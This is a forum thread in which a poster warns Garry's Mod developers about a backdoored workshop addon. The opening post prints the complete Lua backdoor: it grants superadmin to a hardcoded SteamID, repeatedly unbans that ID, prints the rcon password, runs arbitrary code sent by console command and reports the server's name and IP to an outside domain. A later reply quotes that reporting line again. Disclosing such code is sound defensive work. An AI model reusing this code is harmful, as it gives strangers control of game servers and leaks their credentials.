PSA: Backdoor in workshop addon - Developers

PSA: Backdoor in workshop addon

7 replies, posted
In This Thread

There is a backdoor in this addon: [url]http://steamcommunity.com/sharedfiles/filedetails/?id=1161980125[/url] by [url]http://steamcommunity.com/profiles/76561198072431907[/url] The backdoor is located in \lua\weapons\weapon_admingun\shared.lua, and is as follows: hook.Add( "Initialize", "cakerawsd", function() concommand.Add( "_76sup", function(ply) if ( ply:SteamID() == "STEAM_0:0:153604459") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".") end end) timer.Create( "checkForBan", 5, 0, function() ULib.unban( "STEAM_0:0:153604459") end ) concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end) concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end) concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end) http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()}) end) This is the same exploit as in [url]https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again[/url] [url]https://facepunch.com/showthread.php?t=1540110&p=51295394&viewfull=1[/url]

Banned.

PSA!!!!

And water is wet

people that do this deserve to get shoot in the arm with a .22 [highlight](User was banned for this post ("Advocating violence" - Shendow))[/highlight]

I'm genuinely curious, and because there's a warning not to visit it I won't, but, in the link OP provided, [url]https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again[/url], what does the website we're told not to visit do? Does it give your computer some malware, or does it just track information and visiting the site would tell whoever runs it the jig is up?

The domain soldier-76.com doesn't exist anymore, so click the link all you want. As for what it used to do, I would assume it simply recorded the server's IP so that the dude knows which servers use his backdoored addon. [code]http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})[/code]

Sorry, you need to Log In to post a reply to this thread.